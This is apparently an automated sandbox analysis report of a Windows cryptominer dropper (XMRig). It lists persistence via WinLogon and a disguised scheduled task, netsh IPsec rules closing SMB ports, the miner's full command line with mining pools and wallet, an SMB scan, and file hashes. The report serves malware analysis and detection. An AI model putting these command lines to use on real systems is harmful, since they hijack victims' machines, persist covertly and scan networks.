Analysis
- max time kernel: 151s
- max time network: 155s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 19-05-2022 01:41
Behavioral task behavioral1
- Sample: aa.exe
- Resource: win7-20220414-en
Behavioral task behavioral2
- Sample: aa.exe
- Resource: win10v2004-20220414-en
General
- Target: aa.exe
- Size: 28.1MB
- MD5: f9b2e96e5044fdaa7d923d516f6206e8
- SHA1: 936f9c88a574fede2fd37e54189e4b69c1215163
- SHA256: b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
- SHA512: c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1
Malware Config
Signatures
-
Modifies WinLogon for persistence (2 TTPs, 1 IoCs)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\rNcAd\\awtqnk.exe" | awtqnk.exe
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
XMRig Miner Payload (6 IoCs)
Processes:
resource | yara_rule
C:\Windows\rNcAd\awtqnk.exe | xmrig
C:\Windows\rNcAd\awtqnk.exe | xmrig
behavioral2/memory/4992-134-0x0000000000400000-0x0000000002054000-memory.dmp | xmrig
behavioral2/memory/3684-175-0x0000000000400000-0x0000000002054000-memory.dmp | xmrig
C:\Windows\rNcAd\ss.exe | xmrig
behavioral2/memory/2628-179-0x0000000000400000-0x0000000000B4B000-memory.dmp | xmrig
-
Creates new service(s) (1 TTPs)
-
Executes dropped EXE (3 IoCs)
Processes:
pid | process
3684 | awtqnk.exe
2628 | ss.exe
1052 | svchost.exe
-
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | awtqnk.exe
-
Drops file in Windows directory (64 IoCs)
Processes:
description | ioc | process
File created | C:\Windows\rNcAd\cnli-1.dll | awtqnk.exe
File created | C:\Windows\rNcAd\iconv.dll | awtqnk.exe
File created | C:\Windows\rNcAd\libxml2.dll | awtqnk.exe
File created | C:\Windows\rNcAd\pcrecpp-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\cnli-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\libiconv-2.dll | awtqnk.exe
File created | C:\Windows\rNcAd\pcre-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\ssleay32.dll | awtqnk.exe
File created | C:\Windows\rNcAd\Cstr.fb | awtqnk.exe
File created | C:\Windows\rNcAd\qdx.bat | awtqnk.exe
File created | C:\Windows\rNcAd\chrome..xml | awtqnk.exe
File created | C:\Windows\rNcAd\coli-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\etebCore-2.x86.dll | awtqnk.exe
File created | C:\Windows\rNcAd\posh-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\trfo-2.dll | awtqnk.exe
File created | C:\Windows\rNcAd\awtqnk.exe | aa.exe
File created | C:\Windows\rNcAd\etchCore-0.x86.dll | awtqnk.exe
File created | C:\Windows\rNcAd\crli-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\dmgd-1.dll | awtqnk.exe
File created | C:\Windows\rNcAd\TFf | awtqnk.exe
File created | C:\Windows\rNcAd\adfw-2.dll | awtqnk.exe
File created | C:\Windows\rNcAd\eteb-2.dll | awtqnk.exe
File created | C:\Windows\rNcAd\exma-1.dll | awtqnk.exe
File created | C:\Windows\boy.exe | aa.exe
File created | C:\Windows\rNcAd\esco-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\etch-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\libcurl.dll | awtqnk.exe
File created | C:\Windows\rNcAd\trfo-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\zibe.dll | awtqnk.exe
File created | C:\Windows\rNcAd\ip.dll | awtqnk.exe
File created | C:\Windows\rNcAd\chrome..exe | awtqnk.exe
File created | C:\Windows\rNcAd\tucl-1.dll | awtqnk.exe
File opened for modification | C:\Windows\rNcAd\tscl.html | awtqnk.exe
File created | C:\Windows\rNcAd\Cstr.xml | awtqnk.exe
File created | C:\Windows\end.bat | awtqnk.exe
File created | C:\Windows\rNcAd\chrome..fb | awtqnk.exe
File created | C:\Windows\rNcAd\etebCore-2.x64.dll | awtqnk.exe
File created | C:\Windows\rNcAd\zlib1.dll | awtqnk.exe
File created | C:\Windows\rNcAd\svchost.exe | awtqnk.exe
File opened for modification | C:\Windows\end.bat | awtqnk.exe
File created | C:\Windows\rNcAd\ss.exe | awtqnk.exe
File created | C:\Windows\rNcAd\tucl.dll | awtqnk.exe
File created | C:\Windows\rNcAd\WinRing0x64.sys | awtqnk.exe
File created | C:\Windows\rNcAd\trch-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\pcreposix-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\posh.dll | awtqnk.exe
File created | C:\Windows\rNcAd\tibe.dll | awtqnk.exe
File created | C:\Windows\rNcAd\trch-1.dll | awtqnk.exe
File created | C:\Windows\rNcAd\trfo.dll | awtqnk.exe
File created | C:\Windows\rNcAd\s.bat | awtqnk.exe
File created | C:\Windows\rNcAd\dmgd-4.dll | awtqnk.exe
File created | C:\Windows\rNcAd\libeay32.dll | awtqnk.exe
File created | C:\Windows\rNcAd\tibe-2.dll | awtqnk.exe
File created | C:\Windows\rNcAd\tscl.html | aa.exe
File created | C:\Windows\rNcAd\adfw.dll | awtqnk.exe
File created | C:\Windows\rNcAd\etchCore-0.x64.dll | awtqnk.exe
File created | C:\Windows\rNcAd\pcla-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\riar.dll | awtqnk.exe
File created | C:\Windows\rNcAd\riar-2.dll | awtqnk.exe
File created | C:\Windows\rNcAd\tibe-1.dll | awtqnk.exe
File created | C:\Windows\rNcAd\trch.dll | awtqnk.exe
File created | C:\Windows\rNcAd\Cstr.exe | awtqnk.exe
File created | C:\Windows\rNcAd\xdvl-0.dll | awtqnk.exe
File created | C:\Windows\rNcAd\ucl.dll | awtqnk.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
pid | process
3684 | awtqnk.exe (the same entry is listed 64 times)
-
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
description | pid | process
Token: SeLockMemoryPrivilege | 2628 | ss.exe
Token: SeLockMemoryPrivilege | 2628 | ss.exe
-
Suspicious use of SetWindowsHookEx (4 IoCs)
Processes:
pid | process
4992 | aa.exe
4992 | aa.exe
3684 | awtqnk.exe
3684 | awtqnk.exe
-
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
pid | process | target pid | target process | entries
4992 | aa.exe | 3684 | awtqnk.exe | 3
4992 | aa.exe | 3628 | cmd.exe | 3
3684 | awtqnk.exe | 2796 | cmd.exe | 3
2796 | cmd.exe | 2344 | netsh.exe | 3
2796 | cmd.exe | 752 | netsh.exe | 3
2796 | cmd.exe | 900 | netsh.exe | 3
2796 | cmd.exe | 5088 | netsh.exe | 3
2796 | cmd.exe | 4716 | netsh.exe | 3
2796 | cmd.exe | 4768 | netsh.exe | 3
2796 | cmd.exe | 1476 | netsh.exe | 3
2796 | cmd.exe | 4356 | netsh.exe | 3
2796 | cmd.exe | 3328 | netsh.exe | 3
2796 | cmd.exe | 2012 | netsh.exe | 3
3684 | awtqnk.exe | 1060 | cmd.exe | 3
3684 | awtqnk.exe | 932 | cmd.exe | 3
1060 | cmd.exe | 1764 | netsh.exe | 3
932 | cmd.exe | 3140 | netsh.exe | 3
1060 | cmd.exe | 4484 | netsh.exe | 3
1060 | cmd.exe | 216 | netsh.exe | 3
932 | cmd.exe | 240 | netsh.exe | 3
1060 | cmd.exe | 1448 | netsh.exe | 3
932 | cmd.exe | 3704 | netsh.exe | 1 (list cut off at 64 entries)
Processes
-
[1] C:\Users\Admin\AppData\Local\Temp\aa.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\aa.exe"
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\rNcAd\awtqnk.exe
        command line: C:\Windows\rNcAd\awtqnk.exe
        - Modifies WinLogon for persistence
        - Executes dropped EXE
        - Checks computer location settings
        - Drops file in Windows directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\SysWOW64\cmd.exe
            command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add policy name=ipsec_ply
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filterlist name=deny_pt
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filterlist name=allow_pt
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filteraction name=deny action=block
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filteraction name=allow action=negotiate
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static set policy name=ipsec_ply assign=y
        [3] C:\Windows\SysWOW64\cmd.exe
            command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add policy name=ipsec_ply
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filterlist name=deny_pt
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filterlist name=allow_pt
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filteraction name=deny action=block
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filteraction name=allow action=negotiate
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static set policy name=ipsec_ply assign=y
        [3] C:\Windows\SysWOW64\cmd.exe
            command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add policy name=ipsec_ply
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filterlist name=deny_pt
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filterlist name=allow_pt
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filteraction name=deny action=block
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add filteraction name=allow action=negotiate
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
            [4] C:\Windows\SysWOW64\netsh.exe
                command line: netsh ipsec static set policy name=ipsec_ply assign=y
        [3] C:\Windows\SysWOW64\cmd.exe
            command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
        [3] C:\Windows\SysWOW64\sc.exe
            command line: sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"
        [3] C:\Windows\SysWOW64\cmd.exe
            command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\rNcAd\qdx.bat" "
            [4] C:\Windows\SysWOW64\schtasks.exe
                command line: schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\rNcAd\awtqnk.exe" /SC ONSTART
                - Creates scheduled task(s)
        [3] C:\Windows\rNcAd\ss.exe
            command line: "C:\Windows\rNcAd\ss.exe" -o stratum+tcp://wk.monerogx.com:6502 -o stratum+tcp://note.monerogx.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\SysWOW64\cmd.exe
            command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\rNcAd\s.bat" "
            [4] C:\Windows\rNcAd\svchost.exe
                command line: svchost.exe syn 10.127.0.0 10.127.255.255 445 /save
                - Executes dropped EXE
    [2] C:\Windows\SysWOW64\cmd.exe
        command line: cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Windows\end.bat
Filesize: 1KB
MD5: c017d5f762ae5d67efb7d099b53cca58
SHA1: ab7f8553de7614251d76ce54aaee52f1a35e7ae6
SHA256: d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b
SHA512: 856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78
-
C:\Windows\rNcAd\awtqnk.exe
Filesize: 28.1MB
MD5: f9b2e96e5044fdaa7d923d516f6206e8
SHA1: 936f9c88a574fede2fd37e54189e4b69c1215163
SHA256: b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
SHA512: c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1
-
C:\Windows\rNcAd\qdx.bat
Filesize: 116B
MD5: 662ee857ad37429cc2fe7e71d45f531f
SHA1: 3c467a477716fab2a1a6cbeac3bc373b9e52b278
SHA256: 62d500efc31c01d724bf59838c705325928bff3b06b96399ff4611eb9f594414
SHA512: c2e4a3a07a82b0750bde87c6a2b39fc781d6ff604914198a3be688e3707dd5ffeb59cf19775d7d39ee2ddd770ecf26d94dcae5a85c6b17853dfca592668595f5
-
C:\Windows\rNcAd\s.bat
Filesize: 335B
MD5: b5f17481d6d186362e1b989d59f4485b
SHA1: 286e596314689831c647c43a2d7258e7704062bb
SHA256: 92d3d97610deea1906de9c1303e5928808d65c1bb6b0653613e13c0fa81a91f5
SHA512: 5918ae4392e4b7b381426cd121478e12e2f7abbab3bbdeba5f383231aaff25436442f34a8735bc8efa3ab422650cccaf03fcaf22d627a0c10e5e1adbdacb9698
-
C:\Windows\rNcAd\ss.exe
Filesize: 6.7MB
MD5: 8460b86a434521fe122230467dffc2a5
SHA1: f7bd0696c9201d5270cb75deb82895a85a5298a2
SHA256: 812a448e4023b2b7b52dffe30e72b77b96b4f334263e1b0f2daad8e33a68143d
SHA512: fb6504aed5c99010faa00332eecdf2916393490b79b8819a1e338238fd0f21e7255550e3155fc0efbe2295858df84ffe1f703eaf9ffdd824406f80d2c7fe58dc
-
C:\Windows\rNcAd\svchost.exe
Filesize: 14KB
MD5: c097fd043d3cbabcada0878505c7afa5
SHA1: 966a60028a3a24268c049ffadbe1a07b83de24ce
SHA256: 1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA512: 0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\rNcAd\tscl.html
Filesize: 6B
MD5: bfc6fd80246ce526a70a1042bf4331ea
SHA1: 90f0d40ca76df58f7a2cd7207fc0eadea62e41f9
SHA256: b3034d9341c8d2a4ee4183d392e65cc683292ec318f881860f66fb6ee4a90066
SHA512: 3306e4020203416c699e0317aea05db1927fe8aa9da9dee1a712d6eaf650b9231a57ff84b4d31a242f766294590b354658c235c79e8442473ff021e2fce28538